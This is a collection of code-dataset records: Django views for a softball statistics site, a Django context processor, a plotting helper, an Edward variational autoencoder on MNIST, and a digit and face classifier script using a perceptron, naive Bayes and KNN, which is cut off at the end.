+{"seq_id":"620898172","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .models import Stats\n# from .models import Polls\n\nimport pandas as pd\nimport re\nfrom .management import methods\nimport json\nfrom collections import Counter, OrderedDict\n\nfrom .management import config as cfg\ncfg = cfg.Config\nimport time\n\n\n# Create your views here.\ndef index(request):\n # Converting db to df\n db_stats = Stats.objects.all().filter(season = cfg.CURRENT_SEASON, player__in = cfg.CURRENT_SEASON_ROSTER)\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n\n\n db_for_sel = Stats.objects.all()\n df_for_sel = pd.DataFrame(list(db_for_sel.values()))\n df_for_sel =df_for_sel.drop(\"id\",1)\n df_for_sel.columns = cfg.COLUMN_NAMES\n df_for_sel = df_for_sel[cfg.COLUMN_NAMES_ORDER]\n\n df_plot = methods.Softball_Methods.plot_data(df)\n\n # Getting season stats\n df_season = methods.Softball_Methods.season_stats(df)\n\n df_table = df_season.to_html(index=False,classes='table table-striped table-bordered table-hover table-responsive\" id=\"table-custom-sort')\n\n count = 0\n cat_list = []\n new_table = \"\"\n for line in df_table.split(\"\\n\"):\n m_th = re.search(\"<th>\", line)\n m_td = re.search(\"<td>\", line)\n m_tr = re.search(\"<tr>\", line)\n if (m_tr):\n count = 0\n elif (m_th):\n cat_list.append(line.replace(\"<th>\",\"\").replace(\"</th>\",\"\").replace(\" \",\"\"))\n elif (m_td):\n line = line.replace(\"\",\"\")\n count += 1\n new_table = new_table + line+\"\\n\"\n\n\n # high charts data\n '''\n array of dictionary objects.\n [{name: \"Game1\", data[all game 1 ops data]},{}]\n '''\n series = []\n roster = sorted(cfg.CURRENT_SEASON_ROSTER)\n dates = list(sorted(set(df_plot[\"Date\"].tolist())))\n for date in dates:\n df_temp = df_plot[df_plot[\"Date\"] == date]\n
df_temp.sort_values(by=[\"Player\"])\n series.append({\"name\":str(date),\"data\":df_temp[\"OPS\"].tolist()})\n\n\n # polls = Polls.objects.all().values()\n # poll = polls[len(polls)-1]\n context = {\n 'table': new_table,\n 'current_season': cfg.CURRENT_SEASON,\n 'seasons': [\"All\"]+sorted(list(set(df_for_sel[\"Season\"].tolist()))),\n 'players': [\"All\"] + sorted(list(set(df_for_sel[df_for_sel[\"Season\"] == cfg.CURRENT_SEASON][\"Player\"].tolist())), ),\n 'games': [\"All\"]+sorted(list(set(df_for_sel[df_for_sel[\"Season\"]==cfg.CURRENT_SEASON][\"Date\"].apply(lambda x: str(x)).tolist()))),\n 'dataType': \"OPS\",\n 'rosterCats': roster,\n 'seriesData': series,\n }\n # 'pollQuestion': poll[\"question\"],\n # 'possibilities': list(poll[\"poss\"])\n return(render(request, 'softball/index2.html',context))\n\ndef index_updates(request):\n params = request.GET\n season = params[\"season\"]\n game = params[\"game\"]\n player = params[\"player\"]\n\n db_stats = Stats.objects.all()\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df_self = df\n\n if season != \"All\":\n df = df[df[\"Season\"]==season]\n if game != \"All\":\n df[\"Date\"] = df[\"Date\"].apply(lambda x: str(x))\n df = df[df[\"Date\"] == game]\n if player != \"All\":\n df = df[df[\"Player\"]==player]\n\n if season == \"All\" and game == \"All\" and player==\"All\":\n df_season = df.drop(\"Season\", 1)\n df_season = df_season.groupby([\"Player\"]).sum().reset_index()\n df_season = df_season[df_season[\"Games\"]>5]\n df_season = methods.Softball_Methods.stats_calc(df_season)\n elif game != \"All\":\n df_season = methods.Softball_Methods.stats_calc(df)\n df_season = df_season[df_season[\"Games\"]==1]\n elif player != \"All\":\n df_season = methods.Softball_Methods.game_stats(df)\n else:\n df_season = methods.Softball_Methods.season_stats(df)\n\n\n df_table = df_season.to_html(index=False,classes='table table-striped table-bordered table-hover table-responsive\" id=\"table-custom-sort')\n count = 0\n cat_list = []\n new_table = \"\"\n for line in df_table.split(\"\\n\"):\n m_th = re.search(\"\", line)\n m_td = re.search(\"\", line)\n m_tr = re.search(\"\", line)\n if (m_tr):\n count = 0\n elif (m_th):\n cat_list.append(line.replace(\"\",\"\").replace(\"\",\"\").replace(\" \",\"\"))\n elif (m_td):\n line = line.replace(\"\",\"\")\n count += 1\n new_table = new_table + line+\"\\n\"\n\n context = {\n \"table\": new_table,\n 'seasons': [\"All\"] + sorted(list(set(df_self[\"Season\"].tolist()))),\n 'players': [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Player\"].tolist()))),\n 'games': [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Date\"].apply(lambda x: str(x)).tolist()))),\n 'current_season': season,\n 'current_players': player,\n 'current_game': game,\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\ndef change_season(request):\n params = request.GET\n season = params[\"season\"]\n\n db_stats = Stats.objects.all()\n df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df_self = df\n\n context = {\n \"game_list\": [\"All\"] + sorted(list(set(df_self[df_self[\"Season\"] == season][\"Date\"].apply(lambda x: str(x)).tolist())))\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\ndef player_dash(request):\n params = request.GET\n name = params['name']\n db_stats = Stats.objects.all().filter(player=name)\n 
df = pd.DataFrame(list(db_stats.values()))\n df =df.drop(\"id\",1)\n df.columns = cfg.COLUMN_NAMES\n df = df[cfg.COLUMN_NAMES_ORDER]\n df = methods.Softball_Methods.stats_calc(df)\n df = df.sort_values(by='Date')\n\n pa = df[\"PA\"].sum()\n bb = df[\"BB\"].sum()\n fb = df[\"1B\"].sum()\n sb = df[\"2B\"].sum()\n tb = df[\"3B\"].sum()\n fourb = df[\"4B\"].sum()\n hr = df[\"HR\"].sum()\n outs = pa - (bb+fb+sb+tb+fourb+hr)\n\n pie_chart = [\n {\"text\":\"Out\",\"value\":(outs/pa)*100,\"color\":\"rgb(255, 144, 144)\",},\n {\"text\":\"Walk\",\"value\":(bb/pa)*100,\"color\":\"white\",},\n {\"text\":\"1B\",\"value\":(fb/pa)*100,\"color\":\"rgba(144,153,255,1)\",},\n {\"text\":\"2B\",\"value\":(sb/pa)*100,\"color\":\"rgb(255, 144, 248)\",},\n {\"text\":\"3B\",\"value\":(tb/pa)*100,\"color\":\"rgb(255, 225, 144)\",},\n {\"text\":\"4B\",\"value\":(fourb/pa)*100,\"color\":\"rgb(157, 255, 144)\",},\n {\"text\":\"HR\",\"value\":(hr/pa)*100,\"color\":\"rgb(144, 255, 233)\",},\n ]\n\n pie_chart = [x for x in pie_chart if x[\"value\"]>0]\n\n df_bands = df.drop_duplicates(['Date'])\n season_color = ['rgba(68, 170, 213, .2)','rgba(68, 100, 213, .2)','rgba(68, 170, 213, .2)','rgba(68, 100, 213, .2)']\n start = -.5\n bands = []\n season = \"\"\n counter = 0\n color_counter = 0\n for index,row in df_bands.iterrows():\n if index == 0:\n season = row[\"Season\"]\n counter = 1\n elif season == row[\"Season\"]:\n counter = counter +1\n else:\n bands.append( {\"from\": start, \"to\": start+counter, \"color\": season_color[color_counter]})\n start = counter + start\n counter = 1\n color_counter +=1\n season = row[\"Season\"]\n bands.append({\"from\": start, \"to\": start + counter, \"color\": season_color[color_counter]})\n\n df = df[df[\"OPS\"]>0]\n\n player_game_stat_data = [{\"name\":name,\"data\":df[\"OPS\"].tolist()}]\n player_game_stat_cat = [str(x) for x in df[\"Date\"].tolist()]\n\n context = {\n \"player_game_stat_data\": player_game_stat_data,\n \"player_game_stat_cat\": player_game_stat_cat,\n \"player_game_stat_bands\": bands,\n \"pie_chart\":pie_chart\n }\n return JsonResponse(json.loads(json.dumps(context)))\n\n\ndef submit_poll(request):\n # print(request)\n # polls = Polls.objects.all().values()\n # poll = polls[len(polls)-1]\n #\n # overwrite_polls = Polls.object.all().filter(question=polls[\"question\"])\n # print(overwrite_polls)\n pass\n\ndef poll_chart(request):\n pass\n\n\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\nfrom .serializer import StatsSerializer\n\n@api_view(['GET', 'POST'])\n@permission_classes((permissions.AllowAny,))\ndef all_stats(request):\n if request.method == 'GET':\n w = Stats.objects.all()\n serializer = StatsSerializer(w, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = StatsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\ndef consistency(request):\n context ={}\n return(render(request, 'softball/consistency.html',context))\n","sub_path":"softball/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
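Side note on the views above (illustrative, not from the original file): JsonResponse(json.loads(json.dumps(context))) serializes the dict, parses it back, and serializes it again; Django's JsonResponse can take the dict directly, so an equivalent return is:

from django.http import JsonResponse

def example_view(request):  # hypothetical minimal view for illustration
    context = {'current_season': '2019', 'players': ['All']}
    return JsonResponse(context)  # same payload, without the dumps/loads round-trip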
+{"seq_id":"393434575","text":"\"\"\"Context processor for the division\"\"\"\r\nfrom Settings.models import Division\r\n\r\n\r\ndef division_context_processor(request):\r\n \"\"\"Add the division to the context processor\"\"\"\r\n try:\r\n return {'division': Division.objects.get(pk=request.session['division'])}\r\n except KeyError:\r\n return {'division': 'None'}\r\n","sub_path":"Socialservicegit/tools/division_context_processor.py","file_name":"division_context_processor.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"488404447","text":"import matplotlib.pyplot as plt\nimport random\n\n'''\nPlot line charts for several arrays\n'''\ndef plot_data(x=[], data=[[]], labels=[], title = \"T=???\", show=False):\n\t# compute the intermediate values we need\n\tcount = len(data)\n\tif count == 0:\n\t\tprint(\"Data to plot is empty!\")\n\t\treturn\n\tif labels==[]:\n\t\tprint(\"Auto-generating labels for the data\")\n\t\tfor i in range(count):\n\t\t\tlabels += [\"%04d\"%i]\n\tif count!=len(labels):\n\t\tprint(\"Number of labels does not match number of data arrays, cannot plot\")\n\t\treturn\n\tlength = []\n\talldata = []\n\tfor i in range(count):\n\t\tlength += [len(data[i])]\n\t\talldata += data[i]\n\tdataMin = min(alldata)\n\tdataMax = max(alldata)\t\n\tlenMax = max(length)\n\t# generate color data\n\tif count<=7:\n\t\tcolors=\"bgryckm\"\n\telse:\n\t\tcolors = []\n\t\tfor i in range(count):\n\t\t\trandom.seed()\n\t\t\t(r,g,b)=random.randint(0,0x7f), random.randint(0x7f,0xff), random.randint(0,0xff)\n\t\t\tif i%3==0:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(r,g,b)]\n\t\t\tif i%3==1:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(b,r,g)]\n\t\t\tif i%3==2:\n\t\t\t\tcolors += [ '#%02x%02x%02x'%(g,b,r)]\n\t# initial line-chart configuration\t\n\tplt.rcParams['font.sans-serif'] = ['SimHei'] # for Chinese characters\n\tplt.rcParams['axes.unicode_minus']=False # display minus signs correctly\n\tfig,ax = plt.subplots()\n\tplt.title(title)\n\tplt.grid(True)\n\t# define the x and y axes\n\tax.set_ylim([dataMin-(dataMax-dataMin)*0.1,dataMax+(dataMax-dataMin)*0.1]) \n\tif x==[] or len(x)!=lenMax:\n\t\tx= range(lenMax)\n\t# plot\n\tfor i in range(count):\n\t\tplt.plot(x[0:length[i]], data[i], \"o-\",label=labels[i], color=colors[i])\n\tplt.legend(loc='best')\n\tplt.close(0)\n\tif show==True:\n\t\tplt.show()\n\treturn\n\nA=[1,2,3,4,5]\nB=[5,6,3,4,8,1,-2]\nC=[0.1, 0.4, 10]\nx=[4,5,6,7,8,9,10]\nplot_data(x, data=[B,C,A],labels=[\"A\", \"B\",\"C\"], title=u'Test', show=True)\n","sub_path":"Lab03.py","file_name":"Lab03.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
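Side note on plot_data above (illustrative, not from the original file): reseeding random for every series can still yield near-duplicate colors; a deterministic alternative is to sample a qualitative matplotlib colormap:

import matplotlib.pyplot as plt

def make_colors(count):
    cmap = plt.get_cmap('tab20')  # qualitative map with 20 distinct colors
    return [cmap(i % cmap.N) for i in range(count)]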
+{"seq_id":"626647377","text":"\"\"\"\nFrom https://github.com/blei-lab/edward/blob/master/examples/vae.py\n\nVariational auto-encoder for MNIST data.\nReferences\n----------\nhttp://edwardlib.org/tutorials/decoder\nhttp://edwardlib.org/tutorials/inference-networks\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport numpy as np\nimport os\nimport tensorflow as tf\n\nfrom edward.models import Bernoulli, Normal\nfrom edward.util import Progbar\nfrom observations import mnist\nfrom scipy.misc import imsave\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\ndef generator(array, batch_size):\n\t\"\"\"Generate batch with respect to array's first axis.\"\"\"\n\tstart = 0 # pointer to where we are in iteration\n\twhile True:\n\t\tstop = start + batch_size\n\t\tdiff = stop - array.shape[0]\n\t\tif diff <= 0:\n\t\t\tbatch = array[start:stop]\n\t\t\tstart += batch_size\n\t\telse:\n\t\t\tbatch = np.concatenate((array[start:], array[:diff]))\n\t\t\tstart = diff\n\t\tbatch = batch.astype(np.float32) / 255.0 # normalize pixel intensities\n\t\tbatch = np.random.binomial(1, batch) # binarize images\n\t\tyield batch\n\ned.set_seed(42)\n\n# Parameters\nM = 100\nd = 50\nn_epoch = 10\ndata_dir = \"/tmp/data\"\nout_dir = \"/tmp/out\"\n\nif not os.path.exists(out_dir):\n\tos.mkdir(out_dir)\n\n# DATA. MNIST batches are fed at training time.\n(x_train, _), (x_test, y_test) = mnist(data_dir)\nx_train_generator = generator(x_train, M)\n\n# MODEL\n# Define a subgraph of the full model, corresponding to a minibatch of\n# size M.\nz = Normal(loc=tf.zeros([M, d]),\n scale=tf.ones([M, d]))\nhidden = tf.layers.dense(z, 256, activation=tf.nn.relu)\nx = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))\n\n# INFERENCE\n# Define a subgraph of the variational model, corresponding to a\n# minibatch of size M.\nx_ph = tf.placeholder(tf.int32, [M, 28 * 28])\nhidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,\n activation=tf.nn.relu)\nqz = Normal(loc=tf.layers.dense(hidden, d),\n \tscale=tf.layers.dense(\n \thidden, d, activation=tf.nn.softplus))\n\n# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.\ninference = ed.KLqp({z: qz}, data={x: x_ph})\noptimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)\ninference.initialize(optimizer=optimizer)\n\ntf.global_variables_initializer().run()\n\nn_iter_per_epoch = x_train.shape[0] // M\nfor epoch in range(1, n_epoch+1):\n print(\"Epoch: {0}\".format(epoch))\n avg_loss = 0.0\n\n pBar = Progbar(n_iter_per_epoch)\n for t in range(1, n_iter_per_epoch+1):\n \t#print(\"Batch: {0}\".format(t))\n \tpBar.update(t)\n \tx_batch = next(x_train_generator)\n \tinfo_dict = inference.update(feed_dict={x_ph: x_batch})\n \tavg_loss += info_dict['loss']\n\n # Print a lower bound to the average marginal likelihood for an\n # image.\n avg_loss /= n_iter_per_epoch\n avg_loss /= M\n print(\"-log p(x) <= {:0.3f}\".format(avg_loss))\n\n # Prior predictive check.\n images = x.eval()\n for m in range(M):\n \timsave(os.path.join(out_dir, '%d.png') % m, images[m].reshape(28, 28))\n\nsess = ed.get_session()\nlatent = np.array(())\nx_test_generator = generator(x_test, M)\nn_iter_test_set = x_test.shape[0] // M\nfor t in range(1, n_iter_test_set+1):\n\tx_batch = next(x_test_generator)\n\tencoded_mean_test = sess.run(qz.mean(), {x_ph: x_batch})\n\t# Concatenate the evaluated encoded means\n\tif t > 1:\n\t\tlatent = np.concatenate((latent, encoded_mean_test), axis=0)\n\telse:\n\t\tlatent = encoded_mean_test\n\t#print(encoded_mean_test)\n#print(encoded_mean_test.shape)\n#print(latent.shape)\n\n# t-SNE on latent encodings\nembedded = TSNE(n_components=2).fit_transform(latent)\n\n# Plot evaluated encodings for test set\n#if d == 2:\ndf = pd.DataFrame(embedded, columns=('one', 'two'))\ndf['labels'] = y_test \nprint(\"Plot latent encodings.\")\nsns.lmplot('one', 'two', data=df, hue='labels', fit_reg=False, size=8, palette=\"Set1\")\nplt.show()\n\n\n\n\n","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"180513220","text":"import time\r\nimport string\r\nimport math\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom collections import defaultdict, Counter\r\nfrom statistics import mean,stdev\r\n\r\ndef load_data(dataset,datatype):\r\n # load digit and face data according to given datatype\r\n # load train and test data according to given dataset\r\n if 
(datatype=='d'):\r\n        if(dataset==\"Train\"):\r\n            imagefile= open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/trainingimages\",\"r\")\r\n            labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/traininglabels\",'r')\r\n        else:\r\n            imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/testimages\", \"r\")\r\n            labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/digitdata/testlabels\",'r')\r\n    else:\r\n        if (dataset == \"Train\"):\r\n            imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatrain\", \"r\")\r\n            labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatrainlabels\", 'r')\r\n        else:\r\n            imagefile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatest\", \"r\")\r\n            labelfile = open(\"C:/Rutgers/Courses/Fall_2020/Intro_to_AI/Final/data/facedata/facedatatestlabels\", 'r')\r\n    lines= imagefile.read().splitlines()\r\n    images= []\r\n    count = 0\r\n    temp = []\r\n    if(datatype=='d'):\r\n        pixels=28\r\n    else:\r\n        pixels=70\r\n\r\n    for line in lines:\r\n        count += 1\r\n        temp.append(line)\r\n        if(count == pixels):\r\n            images.append(temp)\r\n            count = 0\r\n            temp = []\r\n\r\n    lines = labelfile.read().splitlines()\r\n    labels = []\r\n    for line in lines:\r\n        labels.append(int(line))\r\n    return images, labels\r\n\r\ndef trainPerceptron(images, labels, trainingSize,datatype,test):\r\n    start = time.time()\r\n    if (test == \"classification\"):\r\n        last = int((float(trainingSize / 100.0)) * len(images))\r\n    else:\r\n        last = len(images)\r\n\r\n    wchange = True\r\n    if(datatype=='d'):\r\n        weights = []\r\n        i = 0\r\n        while (i < 10):\r\n            tempArray = [0 for count in range(len(images[0]) * len(images[0][0]))]\r\n            weights.append(tempArray)\r\n            i += 1\r\n        biasSet = [0] * 10\r\n    else:\r\n        weights = [0 for count in range(len(images[0]) * len(images[0][0]))]\r\n        biasSet = 0\r\n\r\n    while wchange:\r\n        wchange = False\r\n        for image in images[0:last]:\r\n            if(datatype=='d'):\r\n                vals = [0.0]*10\r\n                j = 0\r\n                while (j < 10):\r\n                    vals[j] = Activationfunction(image, weights[j], biasSet[j])\r\n                    j += 1\r\n                if (vals.index(max(vals)) != labels[images.index(image)]):\r\n                    # Update weights\r\n                    weights[vals.index(max(vals))], biasSet[vals.index(max(vals))]=Weightchange(image, weights[vals.index(max(vals))], biasSet[vals.index(max(vals))], -1)\r\n                    weights[int(labels[images.index(image)])], biasSet[int(labels[images.index(image)])]=Weightchange(image, weights[int(labels[images.index(image)])], biasSet[int(labels[images.index(image)])], 1)\r\n                    wchange = True  # keep iterating until a full pass makes no updates, as in the face branch\r\n            else:\r\n                vals = Activationfunction(image, weights, biasSet)\r\n                if ((vals >= 0) and (labels[images.index(image)] == 0)):\r\n                    weights, biasSet = Weightchange(image, weights, biasSet, -1)\r\n                    wchange = True\r\n                elif (vals < 0 and (labels[images.index(image)]) == 1):\r\n                    weights, biasSet = Weightchange(image, weights, biasSet, 1)\r\n                    wchange = True\r\n    end = time.time()\r\n    runtime = end - start\r\n    return weights, biasSet, runtime\r\n\r\ndef testPerceptron(images,labels, weights, bias, trainingSize, datatype, runtime):\r\n    correct = 0\r\n    incorrect = 0\r\n    for image in images:\r\n        if(datatype=='d'):\r\n            vals = [0.0]*10\r\n            j = 0\r\n            while (j < 10):\r\n                vals[j] = Activationfunction(image, weights[j], bias[j])\r\n                j += 1\r\n            if (vals.index(max(vals)) != labels[images.index(image)]):\r\n                incorrect += 1\r\n            else:\r\n                correct += 1\r\n        else:\r\n            vals = Activationfunction(image, weights, bias)\r\n            if ((vals >= 0 and 
labels[images.index(image)] == 1) or (vals < 0 and labels[images.index(image)] == 0)):\r\n                correct += 1\r\n            else:\r\n                incorrect += 1\r\n    percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n    percentIncorrect = float(incorrect / float(correct + incorrect)) * 100\r\n    print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n    print(\"Runtime: \" + str(runtime))\r\n    print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n    print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n    return percentCorrect\r\n\r\ndef trainNaive(images, labels, trainingSize,datatype,test):\r\n    start = time.time()\r\n    # Amount of training data to be used\r\n    if(test==\"classification\"):\r\n        last = int((float(trainingSize / 100.0)) * len(images))\r\n    else:\r\n        last = len(images)\r\n    # Calculate priors for digits 0-9\r\n    priors=[]\r\n    imageTables = []\r\n    if(datatype=='d'):\r\n        for i in range(0,10):\r\n            priors.append(float(labels[0:last].count(i))/float(last))\r\n            table = [0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n            imageTables.append(table)\r\n\r\n    else:\r\n        # priors over the same training slice as the digit branch\r\n        facepriors=float(labels[0:last].count(1))/float(last)\r\n        Notfacepriors=float(labels[0:last].count(0))/float(last)\r\n        priors.append(facepriors)\r\n        priors.append(Notfacepriors)\r\n        table = [0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n        imtable=[0.0 for count in range(len(images[0]) * len(images[0][0]))]\r\n        imageTables.append(table)\r\n        imageTables.append(imtable)\r\n\r\n    # Construct an array to load image data\r\n    # Load data other than empty\r\n    for image in images[0:last]:\r\n        if(datatype=='d'):\r\n            currentimageind = int(labels[images.index(image)])\r\n        else:\r\n            if(labels[images.index(image)] == 1):\r\n                currentimageind=0\r\n            else:\r\n                currentimageind=1\r\n\r\n        k = 0\r\n        for i in image:\r\n            for j in i:\r\n                if (j != ' '):\r\n                    imageTables[currentimageind][k] += 1.0\r\n                k += 1\r\n\r\n    for im in range(len(imageTables)):\r\n        for jm in range(len(imageTables[im])):\r\n            if imageTables[im][jm] > 0.0:\r\n                if(datatype=='f'):\r\n                    if(im==0):\r\n                        imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(1))\r\n                    else:\r\n                        imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(0))\r\n                else:\r\n                    imageTables[im][jm] = float(imageTables[im][jm]) / float(labels[0:last].count(im))\r\n            else:\r\n                imageTables[im][jm] = 0.0001\r\n    end = time.time()\r\n    runtime = end - start\r\n    return imageTables, priors, runtime\r\n\r\ndef testDigitNaive(images, labels, tables, priors, trainingSize, runtime):\r\n    correct = 0\r\n    incorrect = 0\r\n    for image in images:\r\n        pDigits, decimalShifts = DigitProbability(image, tables, priors)\r\n        prediction = decimalShifts.index(min(decimalShifts))\r\n        sameshift = []\r\n        count = 0\r\n        #Check if decimalshifts is same for any other digit\r\n        for i in range(len(decimalShifts)):\r\n            if decimalShifts[i] == decimalShifts[prediction]:\r\n                count += 1\r\n                sameshift.append(i)\r\n        flag = -1\r\n        #If the decimal shift is same, then check for prior absolute value\r\n        if count > 1:\r\n            # Get the max of pDigits out of the indexes in duplicates\r\n            tempMax = 0\r\n            tempIdx = prediction\r\n            for j in range(len(pDigits)):\r\n                if j in sameshift:\r\n                    if pDigits[j] > tempMax:\r\n                        tempMax = pDigits[j]\r\n                        tempIdx = j\r\n                        flag = 1\r\n            if (flag == 1):\r\n                prediction = tempIdx  # predict the digit index, not its probability value\r\n\r\n        if labels[images.index(image)] == prediction:\r\n            correct += 1\r\n        else:\r\n            incorrect += 1\r\n\r\n    percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n    percentIncorrect = float(incorrect / float(correct + incorrect)) * 
100\r\n\r\n print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n return percentCorrect\r\n\r\ndef testFaceNaive(images, labels, FaceTable, NotFaceTable, priorFace, priorNotFace, trainingSize,runtime):\r\n correct = 0\r\n incorrect = 0\r\n for image in images:\r\n pFace, decimalShift1 = ImageProbability(image, FaceTable, priorFace)\r\n pNotFace, decimalShift2 = ImageProbability(image, NotFaceTable, priorNotFace)\r\n difference = decimalShift1 - decimalShift2\r\n\r\n if ((difference == 0 and pFace >= pNotFace) or difference < 0):\r\n if (labels[images.index(image)] == 0):\r\n incorrect += 1\r\n else:\r\n correct += 1\r\n elif ((difference == 0 and pFace < pNotFace) or difference > 0):\r\n if (labels[images.index(image)] == 1):\r\n incorrect += 1\r\n else:\r\n correct += 1\r\n percentCorrect = float(correct / float(correct + incorrect)) * 100\r\n percentIncorrect = float(incorrect / float(correct + incorrect)) * 100\r\n print(\"Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\n return percentCorrect\r\n\r\ndef DigitProbability(image, tables, priors):\r\n vals = [1] * 10\r\n k = 0\r\n decimalShifts = [0] * 10\r\n for j in image:\r\n for i in j:\r\n for x in range(len(vals)):\r\n if (i != ' '):\r\n vals[x] = vals[x] * tables[x][k]\r\n else:\r\n vals[x] = vals[x] * (1-tables[x][k])\r\n\r\n\r\n if (vals[x] < 0.1):\r\n vals[x] = vals[x] * 10\r\n decimalShifts[x] += 1\r\n k += 1\r\n for n in range(len(vals)):\r\n vals[n] = vals[n] * priors[n]\r\n\r\n return vals, decimalShifts\r\n\r\ndef Weightchange(image, weights, bias, change):\r\n k = 0\r\n if (change > 0): # Increase weights\r\n bias += 1\r\n else:\r\n bias -= 1\r\n for i in image:\r\n for j in i:\r\n if (j != ' '):\r\n if(change>0):\r\n weights[k] += 1\r\n else:\r\n weights[k] -= 1\r\n k += 1\r\n return weights, bias\r\n\r\ndef Activationfunction(image, weights, bias):\r\n fValue = 0\r\n fValue += bias\r\n k = 0;\r\n for i in image:\r\n for j in i:\r\n if (j == ' '):\r\n fValue += 0\r\n else:\r\n fValue += weights[k]\r\n k += 1\r\n return fValue\r\n\r\ndef ImageProbability(image, featureTable, prior):\r\n val = 1\r\n k = 0\r\n decimalShift = 0\r\n for j in image:\r\n for i in j:\r\n if (i != ' '):\r\n val = val * featureTable[k]\r\n else:\r\n val = val * (1-featureTable[k])\r\n k += 1\r\n if (val < 0.1):\r\n val = val * 10\r\n decimalShift += 1\r\n\r\n return (val * prior), decimalShift\r\n\r\ndef euclidean_distance(testimage, trainimage):\r\n return np.sqrt(sum((testimage - trainimage) ** 2))\r\n\r\ndef Getprediction(labels):\r\n occurence_count = Counter(labels)\r\n prediction= occurence_count.most_common(1)[0][0]\r\n return prediction\r\n\r\ndef predict(k, train_images, train_labels, test_image):\r\n # distances contains tuples of (euclidean_distance, label)\r\n # euclidean_distance(test_image, image)\r\n distances = [[euclidean_distance(test_image, image), label] for (image, label) in zip(train_images, train_labels)]\r\n # sort the distances list by distance\r\n distances.sort(key=lambda r: r[0])\r\n # extract only k closest labels\r\n k_labels = [label for (_, label) in distances[:k]]\r\n return Getprediction(k_labels)\r\n\r\ndef testKNN(images,labels,testimages,testlabels,trainingSize):\r\n i = 0\r\n correct = 
0\r\n incorrect = 0\r\n start = time.time()\r\n last = int((float(trainingSize / 100.0)) * len(images))\r\n for image in testimages:\r\n pred = predict(6, images[0:last], labels[0:last], image)\r\n if pred == testlabels[i]:\r\n correct += 1\r\n else:\r\n incorrect += 1\r\n i += 1\r\n end = time.time()\r\n runtime = end - start\r\n percentCorrect = float(correct) / float(correct + incorrect) * 100\r\n percentIncorrect = float(incorrect) / float(correct + incorrect) * 100\r\n print(\"Face Training Set Size: \" + str(trainingSize) + \"%\")\r\n print(\"Runtime: \" + str(runtime))\r\n print(\"Correct: \" + str(percentCorrect) + \"%\")\r\n print(\"Incorrect: \" + str(percentIncorrect) + \"%\")\r\n\r\ndef img_vec(vec):\r\n b = [list(i) for i in vec]\r\n char_to_replace = {' ': 0, '#': 1, '+': 1}\r\n return [char_to_replace.get(n, n) for i in b for n in i]\r\n\r\ndef AccuracyPrediction(Images,Labels,TestImages,TestLabels,size,datatype,test):\r\n last = int((float(size / 100.0)) * len(Images))\r\n randomlist = random.sample(range(0, len(Images)), last)\r\n RandomImages=[]\r\n RandomLabels=[]\r\n for val in 